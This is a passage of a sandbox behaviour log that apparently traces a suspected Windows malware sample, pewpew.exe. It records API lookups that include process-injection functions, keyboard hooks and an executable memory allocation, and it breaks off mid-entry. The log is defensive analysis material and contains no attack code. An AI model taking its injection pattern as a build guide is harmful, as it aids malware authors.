# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 15.09.2020 22:09:03.640 Process: id = "1" image_name = "pewpew.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe" page_root = "0x4927a000" os_pid = "0xbe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xb0c [0058.362] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0058.363] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0058.363] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0058.363] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0058.363] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0058.363] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0058.363] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0058.363] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0058.364] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0058.364] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0058.364] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0058.364] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0058.364] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0058.364] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0058.364] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0058.364] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualQuery") returned 0x76d4445a [0058.364] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0058.364] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0058.364] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0058.364] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynA") returned 0x76d5192a [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadLocale") returned 0x76d435cf [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoA") returned 0x76d40e00 [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileA") returned 0x76d4e2ce [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0058.365] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpA") returned 0x76d5eceb [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="WriteProcessMemory") returned 0x76d5d9e0 [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="WritePrivateProfileStringW") returned 0x76d6640c [0058.366] GetProcAddress (hModule=0x76d30000, lpProcName="WritePrivateProfileStringA") returned 0x76d67048 [0058.367] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0058.367] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualUnlock") returned 0x76d5ef41 [0058.367] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtectEx") returned 0x76dc45bf [0058.367] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0058.367] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualLock") returned 0x76d5ec3b [0058.367] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAllocEx") returned 0x76d5d9b0 [0058.367] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0058.367] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0058.367] GetProcAddress (hModule=0x76d30000, lpProcName="SystemTimeToFileTime") returned 0x76d45a7e [0058.367] GetProcAddress (hModule=0x76d30000, lpProcName="SuspendThread") returned 0x76d67d7e [0058.367] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0058.367] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0058.367] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadPriority") returned 0x76d432bb [0058.368] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadLocale") returned 0x76d489d9 [0058.368] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadContext") returned 0x76dc5393 [0058.368] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0058.368] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileTime") returned 0x76d5ecbb [0058.368] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0058.368] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileAttributesW") returned 0x76d5d4f7 [0058.368] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileAttributesA") returned 0x76d5ecd3 [0058.368] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0058.368] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0058.368] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0058.369] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0058.369] GetProcAddress (hModule=0x76d30000, lpProcName="SetCurrentDirectoryW") returned 0x76d51260 [0058.369] GetProcAddress (hModule=0x76d30000, lpProcName="SetCurrentDirectoryA") returned 0x76d51834 [0058.369] GetProcAddress (hModule=0x76d30000, lpProcName="ResumeThread") returned 0x76d443ef [0058.369] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0058.369] GetProcAddress (hModule=0x76d30000, lpProcName="RemoveDirectoryW") returned 0x76dc44cf [0058.369] GetProcAddress (hModule=0x76d30000, lpProcName="RemoveDirectoryA") returned 0x76dc44bf [0058.369] GetProcAddress (hModule=0x76d30000, lpProcName="ReadProcessMemory") returned 0x76d5cfcc [0058.369] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0058.369] GetProcAddress (hModule=0x76d30000, lpProcName="QueryDosDeviceW") returned 0x76d6ceec [0058.370] GetProcAddress (hModule=0x76d30000, lpProcName="PostQueuedCompletionStatus") returned 0x76d5ef29 [0058.370] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0058.370] GetProcAddress (hModule=0x76d30000, lpProcName="MulDiv") returned 0x76d41b80 [0058.370] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFileEx") returned 0x76d44c83 [0058.370] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0058.370] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0058.370] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0058.370] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0058.370] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0058.370] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0058.370] GetProcAddress (hModule=0x76d30000, lpProcName="IsBadWritePtr") returned 0x76d6d1ec [0058.371] GetProcAddress (hModule=0x76d30000, lpProcName="IsBadStringPtrW") returned 0x76d63088 [0058.371] GetProcAddress (hModule=0x76d30000, lpProcName="IsBadReadPtr") returned 0x76d6d075 [0058.371] GetProcAddress (hModule=0x76d30000, lpProcName="HeapDestroy") returned 0x76d435b7 [0058.371] GetProcAddress (hModule=0x76d30000, lpProcName="HeapCreate") returned 0x76d44a2d [0058.371] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0058.371] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalUnlock") returned 0x76d5cfdf [0058.371] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalReAlloc") returned 0x76d5e4be [0058.371] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalHandle") returned 0x76d6d27c [0058.371] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalLock") returned 0x76d5d0a7 [0058.371] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0058.372] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFindAtomA") returned 0x76d6d358 [0058.372] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalDeleteAtom") returned 0x76d5cdad [0058.372] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0058.372] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAddAtomA") returned 0x76d60526 [0058.372] GetProcAddress (hModule=0x76d30000, lpProcName="GetWindowsDirectoryW") returned 0x76d443e2 [0058.372] GetProcAddress (hModule=0x76d30000, lpProcName="GetWindowsDirectoryA") returned 0x76d62b0a [0058.372] GetProcAddress (hModule=0x76d30000, lpProcName="GetVolumeInformationA") returned 0x76d66dcb [0058.372] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0058.372] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0058.372] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadPriority") returned 0x76d443bf [0058.373] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadContext") returned 0x76d679d4 [0058.373] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathW") returned 0x76d5d4dc [0058.373] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathA") returned 0x76d6276c [0058.373] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempFileNameW") returned 0x76d6d1b6 [0058.373] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempFileNameA") returned 0x76d69d3f [0058.373] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemInfo") returned 0x76d449ca [0058.373] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0058.373] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryA") returned 0x76d5b66c [0058.373] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeExW") returned 0x76d45586 [0058.373] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeExA") returned 0x76d68266 [0058.373] GetProcAddress (hModule=0x76d30000, lpProcName="GetPrivateProfileStringW") returned 0x76d4ea48 [0058.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetPrivateProfileStringA") returned 0x76d5184c [0058.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0058.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0058.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDriveStringsW") returned 0x76dc436f [0058.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0058.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocalTime") returned 0x76d45aa6 [0058.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0058.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameW") returned 0x76d440d4 [0058.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameA") returned 0x76d4e2c1 [0058.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0058.375] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0058.375] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesA") returned 0x76d45414 [0058.375] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeThread") returned 0x76d5d5b5 [0058.375] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0058.375] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceA") returned 0x76dc433f [0058.375] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatA") returned 0x76d6a959 [0058.375] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0058.375] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0058.375] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0058.375] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentDirectoryW") returned 0x76d45611 [0058.375] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentDirectoryA") returned 0x76d6d4f6 [0058.375] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0058.375] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameA") returned 0x76d5b6e0 [0058.376] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0058.376] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0058.376] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0058.376] GetProcAddress (hModule=0x76d30000, lpProcName="FreeResource") returned 0x76d5d3db [0058.376] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedExchange") returned 0x76d41462 [0058.376] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0058.376] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageA") returned 0x76d65fbd [0058.376] GetProcAddress (hModule=0x76d30000, lpProcName="FlushInstructionCache") returned 0x76d44393 [0058.376] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0058.376] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceA") returned 0x76d5e9bb [0058.376] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0058.376] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileA") returned 0x76d6d53e [0058.376] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0058.377] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToLocalFileTime") returned 0x76d4e29e [0058.377] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToDosDateTime") returned 0x76d5c86d [0058.377] GetProcAddress (hModule=0x76d30000, lpProcName="EnumCalendarInfoA") returned 0x76d69e70 [0058.377] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0058.377] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0058.377] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0058.378] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0058.378] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0058.378] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingA") returned 0x76d45506 [0058.378] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0058.378] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0058.378] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0058.378] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0058.378] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0058.378] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0058.378] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringA") returned 0x76d43c5a [0058.378] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0058.378] GetProcAddress (hModule=0x76d30000, lpProcName="IsBadStringPtrA") returned 0x76d63173 [0058.378] GetModuleHandleA (lpModuleName="user32.dll") returned 0x77130000 [0058.379] GetProcAddress (hModule=0x77130000, lpProcName="GetKeyboardType") returned 0x77189ac4 [0058.379] GetProcAddress (hModule=0x77130000, lpProcName="LoadStringA") returned 0x7714db21 [0058.379] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0058.379] GetProcAddress (hModule=0x77130000, lpProcName="CharNextA") returned 0x77147a1b [0058.379] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0058.379] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExA") returned 0x7714d22e [0058.379] GetProcAddress (hModule=0x77130000, lpProcName="WindowFromPoint") returned 0x7716ed12 [0058.379] GetProcAddress (hModule=0x77130000, lpProcName="WinHelpA") returned 0x7716557f [0058.379] GetProcAddress (hModule=0x77130000, lpProcName="WaitMessage") returned 0x7716f5a9 [0058.379] GetProcAddress (hModule=0x77130000, lpProcName="VkKeyScanW") returned 0x7716fdcd [0058.379] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0058.379] GetProcAddress (hModule=0x77130000, lpProcName="UnregisterClassW") returned 0x77149f84 [0058.379] GetProcAddress (hModule=0x77130000, lpProcName="UnregisterClassA") returned 0x7714dced [0058.380] GetProcAddress (hModule=0x77130000, lpProcName="UnhookWindowsHookEx") returned 0x7716f52b [0058.380] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0058.380] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMDISysAccel") returned 0x7715858e [0058.380] GetProcAddress (hModule=0x77130000, lpProcName="TrackPopupMenu") returned 0x7716c288 [0058.380] GetProcAddress (hModule=0x77130000, lpProcName="SystemParametersInfoA") returned 0x77156c30 [0058.380] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0058.380] GetProcAddress (hModule=0x77130000, lpProcName="ShowScrollBar") returned 0x77154162 [0058.380] GetProcAddress (hModule=0x77130000, lpProcName="ShowOwnedPopups") returned 0x7715ae86 [0058.380] GetProcAddress (hModule=0x77130000, lpProcName="ShowCursor") returned 0x7716f670 [0058.380] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowsHookExW") returned 0x77157603 [0058.381] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowsHookExA") returned 0x7715835c [0058.381] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0058.381] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextA") returned 0x77157aee [0058.381] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowPos") returned 0x77148e4e [0058.381] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowPlacement") returned 0x77154ab6 [0058.381] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowLongW") returned 0x77148332 [0058.381] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowLongA") returned 0x77156110 [0058.381] GetProcAddress (hModule=0x77130000, lpProcName="SetTimer") returned 0x771479fb [0058.381] GetProcAddress (hModule=0x77130000, lpProcName="SetScrollRange") returned 0x7716d50b [0058.381] GetProcAddress (hModule=0x77130000, lpProcName="SetScrollPos") returned 0x771587a5 [0058.382] GetProcAddress (hModule=0x77130000, lpProcName="SetScrollInfo") returned 0x771540cf [0058.382] GetProcAddress (hModule=0x77130000, lpProcName="SetRect") returned 0x77150e1b [0058.382] GetProcAddress (hModule=0x77130000, lpProcName="SetPropA") returned 0x7715822c [0058.382] GetProcAddress (hModule=0x77130000, lpProcName="SetParent") returned 0x77152d64 [0058.382] GetProcAddress (hModule=0x77130000, lpProcName="SetMenuItemInfoW") returned 0x7716d320 [0058.382] GetProcAddress (hModule=0x77130000, lpProcName="SetMenuItemInfoA") returned 0x7715d307 [0058.382] GetProcAddress (hModule=0x77130000, lpProcName="SetMenu") returned 0x77152bb9 [0058.382] GetProcAddress (hModule=0x77130000, lpProcName="SetForegroundWindow") returned 0x7716f170 [0058.382] GetProcAddress (hModule=0x77130000, lpProcName="SetFocus") returned 0x77152175 [0058.382] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0058.382] GetProcAddress (hModule=0x77130000, lpProcName="SetClassLongA") returned 0x7715d5f9 [0058.383] GetProcAddress (hModule=0x77130000, lpProcName="SetCapture") returned 0x7716ed56 [0058.383] GetProcAddress (hModule=0x77130000, lpProcName="SetActiveWindow") returned 0x77153208 [0058.383] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0058.383] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageA") returned 0x7715612e [0058.383] GetProcAddress (hModule=0x77130000, lpProcName="ScrollWindow") returned 0x77159320 [0058.383] GetProcAddress (hModule=0x77130000, lpProcName="ScreenToClient") returned 0x7715227d [0058.383] GetProcAddress (hModule=0x77130000, lpProcName="RemovePropA") returned 0x77158284 [0058.383] GetProcAddress (hModule=0x77130000, lpProcName="RemoveMenu") returned 0x77157381 [0058.383] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseDC") returned 0x77147446 [0058.383] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseCapture") returned 0x7716ed49 [0058.384] GetProcAddress (hModule=0x77130000, lpProcName="RegisterWindowMessageA") returned 0x77150afa [0058.384] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClipboardFormatA") returned 0x77150afa [0058.384] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassW") returned 0x77148a65 [0058.384] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassA") returned 0x7715434b [0058.384] GetProcAddress (hModule=0x77130000, lpProcName="RedrawWindow") returned 0x7715140b [0058.384] GetProcAddress (hModule=0x77130000, lpProcName="PtInRect") returned 0x771511e9 [0058.384] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0058.384] GetProcAddress (hModule=0x77130000, lpProcName="PostMessageW") returned 0x771512a5 [0058.384] GetProcAddress (hModule=0x77130000, lpProcName="PostMessageA") returned 0x77153baa [0058.384] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageA") returned 0x77155f74 [0058.385] GetProcAddress (hModule=0x77130000, lpProcName="OffsetRect") returned 0x77150bbd [0058.385] GetProcAddress (hModule=0x77130000, lpProcName="OemToCharA") returned 0x771a199f [0058.385] GetProcAddress (hModule=0x77130000, lpProcName="MsgWaitForMultipleObjects") returned 0x77150b4a [0058.385] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0058.385] GetProcAddress (hModule=0x77130000, lpProcName="MapWindowPoints") returned 0x77148c40 [0058.385] GetProcAddress (hModule=0x77130000, lpProcName="MapVirtualKeyW") returned 0x77171459 [0058.385] GetProcAddress (hModule=0x77130000, lpProcName="MapVirtualKeyA") returned 0x771a6c1a [0058.385] GetProcAddress (hModule=0x77130000, lpProcName="LoadKeyboardLayoutA") returned 0x7718bb35 [0058.385] GetProcAddress (hModule=0x77130000, lpProcName="LoadIconA") returned 0x7714dafb [0058.394] LoadLibraryA (lpLibFileName="comctl32.dll") returned 0x75590000 [0060.031] LoadLibraryA (lpLibFileName="SHFolder.dll") returned 0x75580000 [0060.056] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0xb05a30 [0060.074] GetKeyboardType (nTypeFlag=0) returned 4 [0060.093] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe\" " [0060.093] GetStartupInfoA (in: lpStartupInfo=0x6ef7fc | out: lpStartupInfo=0x6ef7fc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.093] GetVersion () returned 0x1db10106 [0060.093] GetVersion () returned 0x1db10106 [0060.093] GetCurrentThreadId () returned 0xb0c [0060.112] GetModuleFileNameA (in: hModule=0xd0000, lpFilename=0x6ef2f8, nSize=0x105 | out: lpFilename="." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\.")) returned 0x0 [0060.112] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ef1d3, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe")) returned 0x30 [0060.112] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6ef2e8 | out: phkResult=0x6ef2e8*=0x0) returned 0x2 [0060.194] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6ef2e8 | out: phkResult=0x6ef2e8*=0x0) returned 0x2 [0060.194] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6ef2e8 | out: phkResult=0x6ef2e8*=0x0) returned 0x2 [0060.194] lstrcpynA (in: lpString1=0x6ef1d3, lpString2=".", iMaxLength=261 | out: lpString1=".") returned="." [0060.194] GetThreadLocale () returned 0x409 [0060.194] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x6ef2e3, cchData=5 | out: lpLCData="ENU") returned 4 [0060.195] lstrlenA (lpString=".") returned 1 [0060.195] LoadStringA (in: hInstance=0xd0000, uID=0xffd6, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid NULL variant operation") returned 0x1e [0060.196] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0xb05da8 [0060.196] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1ff0000 [0060.196] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0xb06da8 [0060.196] VirtualAlloc (lpAddress=0x1ff0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1ff0000 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffd5, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0060.197] LoadStringA (in: hInstance=0xd0000, 